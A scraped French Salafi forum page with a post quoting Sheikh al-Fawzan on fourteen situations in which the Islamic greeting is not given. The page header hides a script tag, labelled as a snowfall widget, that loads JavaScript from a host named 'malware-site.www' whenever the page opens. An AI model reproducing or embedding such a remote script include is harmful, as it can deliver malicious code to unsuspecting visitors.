ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Février 2018

LunMarMerJeuVenSamDim
   1234
567891011
12131415161718
19202122232425
262728    

Calendrier Calendrier


    14 cas dans lequel il ne faut pas rendre le salam

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    14 cas dans lequel il ne faut pas rendre le salam

    Message par assalafia le Ven 12 Déc - 14:34

    Surprised

    الحمد لله وحده، والصلاة والسلام على من لا نبي بعده، وعلى آله وصحبه، أما بعد
     


    Sheikh Salih bin Fawzan Al-Fawzan (hafidhahullaah) a dit lors de son explication de Mandhoomah Al-Adaab:


    « Voici les cas dans lesquels passer le salaam est détestable:
    Le premier cas: il est détestable de passer le salaam à celui qui parle, car il est occupé par une conversation avec d’autres personnes.


    Le deuxième cas: concerne celui qui est occupé dans le dhikr,  par le biais du tasbih (dire: Soubhaanallaah) et le Tahlil (dire: laa ilaaha illallaah), ainsi que dans la récitation du Qur’an.


    Le troisième cas: concerne celui qui est en réflexion avec les ahadith parmi les paroles de Mohammed (صلى الله عليه و سلم).


    Le quatrième cas: passer le salaam au khatib (NDT: celui qui délivre la khotba) pendant le sermon du Vendredi pendant lequel il est interdit de parler; ainsi passer le salaam au khatib et à ceux qui sont présents n’est pas permis.


    Le cinquième cas: « Celui qui donne un cours » , c’est à dire celui qui donne un cours en rapport avec le Qur’an, le Hadith, le Fiqh ou la grammaire: On ne lui passe pas le salaam. Quand certains arrivent dans une assemblée et que la leçon a commencé; ils passent le salaam et élèvent la voix, cela est détestable car cela distrait l’enseignant tout comme ceux qui sont assis et écoutent, du fait qu’ils détournent leur attention.


    Le sixième cas: « Ceux qui font des recherches scientifiques » – Quiconque fait des recherches sur un sujet parmi les thèmes scientifiques, ne lui passez pas le salaam car cela va perturber sa recherche; ce n’est pas légiféré.


    Le septième cas: « Celui qui exhorte » – quant à celui qui est exhorte les gens; ne lui passe pas le salaam si tu approches, mais assieds-toi et écoute l’exhortation. On ne passe pas le salaam car cela va distraire celui qui parle comme ceux qui écoutent.


    Le huitième cas: celui qui apprend ou révise (un sujet de) Fiqh.


    Le neuvième cas: « le mouadhin », ne lui passe pas le salaam alors qu’il est en train de faire l’adhan; car tu vas interrompre l’adhan.


    Le dixième cas: « celui qui prie » – si tu arrives et que quelqu’un prie; ne lui passe pas le salaam jusqu’à ce qu’il ait conclu sa prière. Il a été rapporté que l’un des compagnons a passé le salaam au Prophète (صلى الله عليه و سلم ) alors qu’il était en prière, il lui a répondu avec un signe[1]. Par conséquent, si quelqu’un te passe le salaam alors que tu pries, tu lui réponds avec un signe.


    Le onzième cas: « celui qui se purifie » – concernant celui qui effectue les ablutions, ne lui passe pas le salaam jusqu’à ce qu’il ait terminé ses ablutions. Quant à celui qui se baigne (ou douche) dans un but autre que l’adoration; afin de se rafraichir ou de se laver, il n’y a rien qui empêche de lui passer le salaam.


    La douzième cas: Egalement, il n’est pas légiféré de passer le salaam à celui qui est en train de manger.


    Le treizième cas: « Celui qui est en train de déféquer » – cela est très grave, quant à celui qui est en train d’uriner ou de déféquer – ne lui passe pas le salaam alors qu’il est en train de se soulager. Parce qu’il est détestable pour celui qui est en train de déféquer ou d’uriner de parler, ne lui passe pas le salaam.


    Le quatorzième cas: « Celui qui combat l’ennemi dans une guerre » – le dernier cas concerne le Moudjahid qui est en train de combattre; vous ne devriez pas passer le salaam à celui qui se bat parce qu’il est occupé dans la lutte contre les ennemis d’Allah ». »


    (Tiré de: Ithaaf At-Tullaab bi-Sharh Mandhoomah Al-Adaab p.219-221)


    [1] Comme cela est rapporté par at-Tirmidhi dans le livre de la Prière (no.367).

      La date/heure actuelle est Mar 20 Fév - 16:17